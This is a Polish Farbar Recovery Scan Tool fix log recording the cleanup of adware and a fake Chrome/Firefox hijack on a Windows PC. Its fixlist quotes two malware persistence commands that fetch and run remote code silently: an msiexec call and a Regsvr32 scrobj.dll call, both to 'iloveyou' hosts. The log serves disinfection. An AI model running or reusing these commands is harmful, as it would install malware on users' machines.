Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 26-04-2017
Uruchomiony przez monic (26-04-2017 20:12:53) Run:2
Uruchomiony z C:\Users\monic\Downloads
Załadowane profile: monic (Dostępne profile: monic)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== /q
IFEO\taskmgr.exe: [Debugger] 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) <==== UWAGA
RemoveDirectory: C:\Program Files (x86)\Doeye
RemoveDirectory: C:\Users\monic\AppData\Local\Doeye
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () <==== UWAGA
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\monic\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\monic\AppData\LocalLow\Mozilla
RemoveDirectory: C:\Users\monic\AppData\Local\Firefox
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) <==== UWAGA
Task: {C5EE9E09-5CBF-4EE4-93F9-8B35118FB45D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== scrobj.dll
C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{2CDFE13B-4291-4ECE-9150-EE5582884422}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe
FirewallRules: [{21F23E99-1CBA-44A9-AF05-F78F7A3D6E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{396E9080-41DF-42AF-A767-59D0DD3E1217}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
C:\Users\monic\Desktop\GIMP 2.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
EmptyTemp:
*****************

Procesy zostały pomyślnie zamknięte.
Punkt przywracania został pomyślnie utworzony.
HKU\S-1-5-21-371738369-586191522-401486134-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => klucz pomyślnie usunięto
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => klucz nie znaleziono. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => klucz pomyślnie usunięto
HKCR\Wow6432Node\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => klucz nie znaleziono. 
HKU\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => klucz pomyślnie usunięto
"C:\Program Files (x86)\Doeye" => pomyślnie usunięto.
"C:\Users\monic\AppData\Local\Doeye" => pomyślnie usunięto.
HKLM\System\CurrentControlSet\Services\FirefoxU => klucz pomyślnie usunięto
FirefoxU => serwis pomyślnie usunięto
"C:\Program Files (x86)\Firefox" => pomyślnie usunięto.
"C:\Users\monic\AppData\Roaming\Firefox" => pomyślnie usunięto.
"C:\Users\monic\AppData\LocalLow\Mozilla" => pomyślnie usunięto.
"C:\Users\monic\AppData\Local\Firefox" => pomyślnie usunięto.
HKLM\System\CurrentControlSet\Services\ibtsiva => klucz pomyślnie usunięto
ibtsiva => serwis pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\wfpcapture => klucz pomyślnie usunięto
wfpcapture => serwis pomyślnie usunięto
HKU\S-1-5-21-371738369-586191522-401486134-1001_Classes\ChromeHTML => klucz pomyślnie usunięto
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C5EE9E09-5CBF-4EE4-93F9-8B35118FB45D} => klucz pomyślnie usunięto
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C5EE9E09-5CBF-4EE4-93F9-8B35118FB45D} => klucz pomyślnie usunięto
C:\Windows\System32\Tasks\PowerWord-SCT-JT => pomyślnie przeniesiono
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz pomyślnie usunięto
C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyślnie przeniesiono
C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono
C:\Users\Public\Desktop\Google Chrome.lnk => pomyślnie przeniesiono
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2CDFE13B-4291-4ECE-9150-EE5582884422} => Wartość pomyślnie usunięto
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{21F23E99-1CBA-44A9-AF05-F78F7A3D6E7C} => Wartość pomyślnie usunięto
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{396E9080-41DF-42AF-A767-59D0DD3E1217} => Wartość pomyślnie usunięto
C:\Users\monic\Desktop\GIMP 2.lnk => pomyślnie przeniesiono
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono
C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono

=========== EmptyTemp: ==========

BITS transfer queue => 299011 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 761233859 B
Java, Flash, Steam htmlcache => 610 B
Windows/system/drivers => 47697175 B
Edge => 26161746 B
Chrome => 789228715 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 1536 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 980 B
systemprofile32 => 0 B
LocalService => 42271 B
NetworkService => 3714 B
monic => 406821021 B

RecycleBin => 38581174 B
EmptyTemp: => 1.9 GB danych tymczasowych Usunięto.

================================


System wymagał restartu.

==== Koniec  Fixlog 20:15:23 ====